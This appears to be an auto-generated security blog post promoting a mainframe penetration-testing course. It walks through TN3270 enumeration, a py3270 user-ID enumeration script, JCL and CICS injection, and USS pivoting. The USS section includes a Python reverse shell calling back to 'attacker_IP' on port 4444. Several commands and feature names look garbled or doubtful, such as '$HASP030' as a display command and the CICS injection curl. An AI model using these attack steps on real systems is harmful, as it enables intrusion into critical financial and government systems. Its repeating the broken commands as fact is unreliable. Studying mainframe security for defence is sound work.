Listen to this Post

Introduction:
Mainframes power 90% of Fortune 500 transactions, yet fewer than 5% of security professionals have ever run a penetration test against IBM z/OS or its equivalents. With global financial systems, healthcare records, and government infrastructures relying on these legacy behemoths, the attack surface is massive—and largely unguarded due to a severe skill shortage. This article dissects the core techniques, commands, and defensive strategies taught in the only publicly available instructor-led mainframe penetration testing course, which kicks off next week for APAC time zones at an exclusive $790 rate.
Learning Objectives:
- Understand the unique architecture of mainframe subsystems (CICS, IMS, DB2) and how traditional pentesting tools fail against them.
- Execute practical TN3270 enumeration, RACF/ACF2/Top Secret privilege escalation, and JCL injection attacks.
- Build a mainframe-specific hardening checklist using native z/OS commands and third-party monitoring tools.
You Should Know:
- TN3270 Enumeration & Banner Grabbing – The Mainframe Discovery Phase
Most penetration testers start with Nmap, but mainframes speak TN3270 (telnet on port 23/992) – not raw TCP. Here’s how to discover and fingerprint mainframe services.
Step-by-step guide:
- Use Nmap with the `tn3270` script to identify IBM mainframes:
nmap -p 23,992 --script tn3270 -sV <target_IP>
- For Windows, use `tn5250` or `c3270` (Cygwin or WSL) to manually connect:
c3270 -port 23 <target_IP>
- Once connected, capture the LU name, TSO logon screen, and any welcome banners. Attackers look for default USS (Unix System Services) shells or unprotected `IKJACCNT` parms.
What this does: It reveals the mainframe type, subsystem availability, and potential misconfigurations (e.g., TSO allowed to anonymous users).
Mitigation: Disable TN3270 on production LPARs; use z/OS Communications Server with TLS and client certificate authentication.
- RACF User Enumeration – The Token Harvesting Attack
RACF (Resource Access Control Facility) is the primary security manager on z/OS. Without valid credentials, an attacker can still enumerate valid user IDs via RACF error message differences.
Step-by-step guide (Linux & z/OS shell):
- From a TN3270 session, attempt to logon with a guessed user ID. RACF returns different error messages for non-existent vs. locked users.
- Use a Python script with `py3270` library to automate:
from py3270 import Emulator e = Emulator(visible=False) e.connect('target_mainframe', port=23) e.send_string('tso logon') for user in open('users.txt'): e.send_string(user.strip()) e.send_enter() output = e.string_get(0,0,80) if 'INVALID USERID' not in output: print(f"Valid user: {user.strip()}") - On Windows, use `tn3270` with AutoHotkey or PowerShell to capture screen buffers.
What this does: It quickly identifies active RACF user IDs without a password, enabling targeted password spraying or social engineering.
Mitigation: Implement RACF’s `NOUSER` masking and generic error messages. Use multi-factor authentication (MFA) via RACF’s `RACF MFA` feature.
- JCL Injection – From Batch Jobs to System Compromise
Job Control Language (JCL) is the scripting language for batch processing on mainframes. If an attacker can inject JCL into privileged job streams (e.g., through a vulnerable CICS transaction or FTP batch upload), they can run arbitrary commands under the job owner’s authority.
Step-by-step guide (z/OS native commands):
- Submit a simple JCL to list system catalogs (requires `SUBMIT` authority):
//INJECTJOB JOB (ACCT),'ATTACKER',CLASS=A,MSGCLASS=X //STEP1 EXEC PGM=IKJEFT01 //SYSTSPRT DD SYSOUT= //SYSTSIN DD LISTC ENT('SYS1.') ALL / - More advanced – execute Unix shell commands using BPXBATCH:
//BASHSTEP EXEC PGM=BPXBATCH,REGION=0M //STDPARM DD sh -c "id > /tmp/owned.txt; netstat -a > /tmp/netstat.out"
- To deliver a reverse shell, combine JCL with a TCP socket using a custom assembler program or Python (if Python is installed in USS).
What this does: JCL injection can read/write any dataset the job owner can access, escalate privileges via privileged PROCs, or pivot to USS and the network.
Mitigation: Restrict `SUBMIT` to authorized users; use RACF’s `JESINPUT` class to control job sources; enable JCL validation and monitoring with tools like IBM zSecure.
- CICS Transaction Abuse – Web-Style Attacks on Green Screens
CICS (Customer Information Control System) is the online transaction processing subsystem. Many CICS transactions are exposed via TN3270 or web services and suffer from classic injection flaws – command injection, transaction smuggling, and privilege bypass.
Step-by-step guide:
- Discover CICS transactions using `CESN` (CICS sign-on) and the `CEMT` inquiry transaction:
CEMT INQUIRE PROGRAM() – lists all programs CEMT INQUIRE TRANSACTION() – lists all transactions
- Test for command injection in a transaction that takes user input (e.g., `CECI` – command execution):
CECI INQUIRE SYSTEM – if returns SYSTEM, you can run any CICS command.
- For web-enabled CICS (CICS Transaction Gateway), send HTTP POST requests with injected `EXEC CICS` commands:
curl -X POST https://target/cics/cicsweb –data "EXEC CICS LINK PROGRAM('IKJEFT01') INPUT('SH')"
What this does: A successful CICS injection can give the attacker full control over the region, including the ability to modify files, execute OS commands via CICS SPOOL, or shut down the region.
Mitigation: Apply CICS transaction security (RACF `TCICSTRN` class); remove development transactions like `CECI` from production; validate all user inputs in COBOL/PL/I programs.
- z/OS Unix System Services (USS) Pivoting – From Mainframe to Linux-Like Shell
USS is a POSIX-compliant environment running alongside MVS. If an attacker compromises a TSO user with USS access, they can execute standard Linux commands, upload tools via scp, and break out of mainframe restrictions.
Step-by-step guide:
- From TSO, start a USS shell: `OMVS` or
SHELL. - Once in USS, use familiar Linux commands to enumerate:
uname -a z/OS release id RACF user and groups ls -la / USS root filesystem cat /etc/passwd USS users (may contain RACF IDs)
- Escalate by searching for setuid binaries (rare on z/OS but present):
find / -perm -4000 -ls 2>/dev/null
- To maintain access, copy a reverse shell script (e.g., Python) and execute:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh"])'
What this does: USS provides a familiar attack surface – weak file permissions, world-writable directories, and vulnerable SUID programs – that can lead to full compromise of the mainframe’s Unix services.
Mitigation: Implement strict RACF controls on USS resources (HFS/ZFS files, `BPX.SUPERUSER` authority); disable unnecessary USS features; monitor USS processes with IBM QRadar or Splunk.
- Mainframe Hardening & Detection Commands (For Blue Teams)
Defenders must know how to detect the above attacks using native z/OS tools and RACF commands.
Step-by-step guide (z/OS console and TSO):
- Check for failed TN3270 logons:
//RACFLOG EXEC PGM=IKJEFT01 //SYSTSPRT DD SYSOUT= //SYSTSIN DD LISTUSER (IRRLOGON)
- Review JES spool for unauthorized job submissions:
“`bash/OS
$HASP030 (display active jobs)
$D J,JOBNAME (detailed job info)
- Enable RACF auditing on `SUBMIT` and <code>JESINPUT</code>: ```bash/OS SETROPTS LOGOPTIONS(SUBMIT(FAILURES))
– On Linux/Windows jump servers that connect to mainframes, capture TN3270 traffic with tcpdump:
sudo tcpdump -i eth0 -s 0 -w mainframe_traffic.pcap port 23 or port 992
– Use open-source mainframe detection tools like `zscan` (Python) to scan for open TN3270 ports and banner leaks.
What this does: These commands turn raw logs into actionable alerts, enabling SOC teams to detect mainframe attacks that bypass traditional EDR.
Mitigation: Implement a dedicated mainframe SIEM connector (e.g., IBM Security QRadar z/OS agent); conduct monthly red team exercises using the techniques above.
What Undercode Say:
- Key Takeaway 1: Mainframe penetration testing is a zero‑competition niche – only one publicly available instructor‑led course exists, and seats are nearly gone at $790 APAC pricing.
- Key Takeaway 2: The same injection and enumeration flaws that plague web apps (JCL injection, CICS command injection) exist on mainframes, but lack of awareness makes them goldmines for attackers.
- Analysis: Over the next 18 months, we predict a wave of mainframe breaches as ransomware groups discover these attack vectors. Organizations still relying on `CECI` in production or open TN3270 ports will be the first to fall. Defenders must immediately audit RACF settings, disable unnecessary transactions, and train at least one team member in mainframe offensive security – the course mentioned here offers the fastest path. The $790 investment is negligible compared to a single hour of mainframe downtime.
Prediction:
Mainframe security will transition from “arcane knowledge” to a mandatory compliance checkbox by 2028. Regulatory bodies (PCI DSS, HIPAA, SOC2) will add mainframe-specific penetration testing requirements, driving demand for certified testers. Expect the rise of automated mainframe fuzzers and cloud-based mainframe emulators for safe training. The early adopters who take Kev Milne’s course now will command six-figure consulting fees within two years, while laggards will scramble to patch decade-old vulnerabilities exposed by the coming wave of mainframe ransomware.
▶️ Related Video (78% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Ryan Williams – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


